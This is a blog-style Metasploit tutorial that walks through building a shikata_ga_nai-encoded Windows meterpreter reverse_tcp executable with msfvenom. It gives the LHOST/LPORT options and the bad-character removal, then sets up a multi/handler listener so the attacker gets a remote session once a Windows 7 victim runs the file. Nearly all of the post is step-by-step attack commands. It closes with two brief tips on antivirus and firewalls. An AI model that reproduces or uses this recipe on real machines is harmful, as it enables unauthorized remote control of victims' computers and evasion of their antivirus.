Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R2
Victim O.S : Windows 7 SP1
After last tutorial about generating a shellcode using msfpayload, today we will learn to use another Metasploit framework commend line instance called msfvenom.
In this tutorial about create exploit using msfvenom to hack windows 7 sp1, we will make an exploit by using msfvenom and then execute it on victim and we will try to connect to victim computer after that.
Here I get from offensive-security.com about the explanation of msfvenom :
msfvenom is a combination of Msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:
- One single tool
- Standardized command line options
- Increased speed
1. Metasploit framework
1. Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tools.
I think all the explanation above already clear about the usage of this msfvenom.
2. In this tutorial I want to create an exploit generated by msfvenom with meterpreter payload and I also want to encode it using shikata_ga_nai encoder. To know the available options to set up this exploit, you can use -o options after you set up your payload.
3. Yep there it is, we need to set up the LHOST and LPORT to make this exploit work. My IP address is 192.168.8.91 so I set the LHOST to that IP, and I want to set the LPORT to 443 so I will receive connection from victim on port 443 if the exploit succeed.
-p windows/meterpreter/reverse_tcp --> I use meterpreter reverse_tcp for the payload -e x86/shikata_ga_nai --> encoder that I use for this tutorial -i 5-b '\x00' --> remove the bad chars
As you can see on above picture, I generate the exploit on Desktop folder and I named it abc.exe.
4. Exploit that successfully generated on step 3, we need to send it to victim later. The next step we need to set up the listener on our attacker computer by using handler.
5. Run your metasploit console by execute msfconsole on your terminal.
6. As I've already say above that I want to use meterpreter reverse_tcp payload, so I need to set it up.
use exploit/multi/handler --> to handle incoming connection set payload windows/meterpreter/reverse_tcp --> reverse tcp payload show options --> show available options to set
7. Now the next step we also need to set up the LHOST and LPORT and make sure it's the same with the one you have set up on step 3.
our handler ready to receive connection on port 443
8. When you send the exploit to victim, and victim execute it, we got this :
1. Always update your antivirus to the latest version
2. Don't forget to install personal firewall for your PC
Hope it's useful 🙂